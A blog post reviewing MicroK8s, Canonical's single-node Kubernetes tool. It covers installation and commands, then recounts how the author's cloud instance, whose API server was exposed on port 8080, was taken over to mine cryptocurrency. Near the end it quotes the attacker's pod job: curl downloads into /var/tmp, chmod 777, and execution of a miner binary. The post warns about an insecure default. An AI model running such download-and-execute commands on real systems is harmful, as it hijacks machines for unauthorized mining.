An overview of MicroK8s (a tool to quick-start a Kubernetes cluster) and why using it in the cloud was a terrible idea

At the KuberCon Seattle this year Canonical (the company behind Ubuntu) was giving out T-shirts for trying out one of their tools for Kubernetes (K8s for short) cluster provisioning — MicroK8s.

microk8s provides a single command installation of the latest Kubernetes release on a local machine for development and testing. Setup is quick, fast (~30 sec) and supports many plugins including Istio with a single command.

Since K8s is not the easiest thing to get started with, having a tool that would make it easy for you to get going is very desirable. I was excited to try it out and I wanted a 👕 as well.

The microk8s claim:

Single node Kubernetes done right
Zero-ops k8s on just about any Linux box.
It’s not elastic, but it is on rails. Use it for offline development, prototyping, testing, or use it on a VM as a small, cheap, reliable k8s for CI/CD. Makes a great k8s for appliances — develop your IoT apps for k8s and deploy them to MicroK8s on your boxes.

Both minikube and microk8s can spin up a single node K8S cluster for you. There are a few important differences, though.

minikube is VM based and is generally aimed towards macOS and Windows users. On Linux, it can provision a K8s instance with or without a VM. However, it’s very much not recommended to use minikube outside of a VM, as it can cause damage to the host system.

microk8s is strictly for Linux. There is no VM involved. It is distributed and runs as a snap — a pre-packaged application (similar to a Docker container). Snaps can be used on all major Linux distributions, including Ubuntu, Linux Mint, Debian and Fedora.

To try microk8s I first needed a Linux box.

The easiest and quickest option to get one up was spinning up a DigitalOcean “droplet” in the cloud with Ubuntu 18.04.

microk8s installation was indeed quick and painless:

sudo snap install microk8s --classic

microk8s comes with a set of tools:

microk8s.config    microk8s.docker    microk8s.inspect   microk8s.kubectl   microk8s.start     microk8s.stop
microk8s.disable   microk8s.enable    microk8s.istioctl  microk8s.reset     microk8s.status

microk8s.start and microk8s.stop do what you’d expect — start/stop your K8S cluster.

microk8s.status is a little less intuitive, as it shows the status of the add-ons and not the cluster status. Use it along side microk8s.enable and microk8s.disable to control add-ons:

$ microk8s.status
microk8s is running
gpu: disabled
storage: enabled
registry: enabled
ingress: enabled
dns: disabled
metrics-server: disabled
istio: disabled
dashboard: disabled

To see the actual microk8s cluster status, use microk8s.inspect:

Inspecting services
Service snap.microk8s.daemon-docker is running
Service snap.microk8s.daemon-apiserver is running
Service snap.microk8s.daemon-proxy is running
Service snap.microk8s.daemon-kubelet is running
Service snap.microk8s.daemon-scheduler is running
Service snap.microk8s.daemon-controller-manager is running
Service snap.microk8s.daemon-etcd is running
Copy service arguments to the final report tarball
Inspecting AppArmor configuration
Gathering system info
Copy network configuration to the final report tarball
Copy processes list to the final report tarball
Copy snap list to the final report tarball
Inspect kubernetes cluster

WARNING: IPtables FORWARD policy is DROP. Consider enabling traffic forwarding with: sudo iptables -P FORWARD ACCEPT
Building the report tarball
Report tarball is at /var/snap/microk8s/340/inspection-report-20181217_015503.tar.gz

microk8s.docker can be used to talk to the Docker daemon:

$ microk8s.docker version
Version: 17.03.2-ce
API version: 1.27
Go version: go1.6.2
Git commit: f5ec1e2
Built: Thu Jul 5 23:07:48 2018
OS/Arch: linux/amd64

Version: 17.03.2-ce
API version: 1.27 (minimum version 1.12)
Go version: go1.6.2
Git commit: f5ec1e2
Built: Thu Jul 5 23:07:48 2018
OS/Arch: linux/amd64
Experimental: false

The 17.03.2-ce Docker version was released on 2017–05–29. I have no idea why microk8s sticks with an over 1.5 years old Docker release.

Update: Since this was brought up in comments, I found a relevant issue on GitHub. Apparently, Docker version in microk8s depends on the underlying Ubuntu version of the snap. The update is in the works. In the edge version of microk8s the snap is built with Ubuntu Core 18 and Docker 18.06:

sudo snap install microk8s --classic --edge

microk8s.istioctl is used to control Istio (a very powerful and complex service mesh implementation — totally out of scope for this post), which can be enabled as an add-on via microk8s.enable istio.

microk8s.kubectl is a wrapper around kubectl — the cluster manager tool for Kubernetes:

$ microk8s.kubectl cluster-info
Kubernetes master is running at
$ microk8s.kubectl get nodes
ubuntu-s-4vcpu-8gb-sfo2-01 Ready <none> 4d6h v1.13.0

microk8s.config, shows the client config that can be used to connect to your cluster, should you decide not to use microk8s.kubectl to do that.

$ microk8s.config
apiVersion: v1
- cluster:
name: microk8s-cluster
- context:
cluster: microk8s-cluster
user: admin
name: microk8s
current-context: microk8s
kind: Config
preferences: {}
- name: admin
username: admin

There are several ways you can feed this client config to kubectl:

  • Write it to ~/.kube/config — the default configuration location
  • Pass it as a parameter to kubectl (every time)
    kubectl --kubeconfig=./client-config ...
  • Export it via the environment variable (once per terminal session)
    export KUBECONFIG=/absolute/path/to/client-config

Once the config is in place (using either method), check the cluster info:

$ kubectl --kubeconfig=./do-k8s-config.yaml cluster-info
Kubernetes master is running at
To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'.
$ kubectl --kubeconfig=./do-k8s-config.yaml get nodes
ubuntu-s-4vcpu-8gb-sfo2-01 Ready <none> 4d7h v1.13.0

At this point, the more experienced Kubernetes folks have figured out why it was a bad idea to play with microk8s in the cloud.

My microk8s cluster playground was totally unprotected and open to the whole world!

This detail is vaguely mentioned in the README in the microk8s repo and is definitely not obvious, especially for novice users.

Note: The API server on port 8080 is listening on all network interfaces.

It took just a few hours for my microk8s-provisioned instance to be discovered, exploited and mining crypto:

Crypto minining pod fleet
Inspecting one of the pods

Here’s the actual job pods were running:

curl -o /var/tmp/config.json;
curl -o /var/tmp/suppoie1;
chmod 777 /var/tmp/suppoie1;
cd /var/tmp;
./suppoie1 -c config.json

I saved the config.json in a gist if anyone is interested to look at it closer.

Apparently, this issue was already reported to the microk8s team back in September:

There is a PR in review to secure microk8s by default. I hope the microk8s team gets it merged and released soon.

Update: This article received a bunch of angry comments in /r/kubernetes/. Apparently, microk8s (in its current iteration) was not intended to be used outside a local/locked down environment. Now you also know what’s going to happen if you do (accidentally or intentionally) use it in the public cloud 😄. It was a fun and useful experiment anyway and I learned from it.

I hope you found this article useful. Help others discover it on Medium by giving it some claps 👏 (the more — the merrier 😃) . Thanks for reading!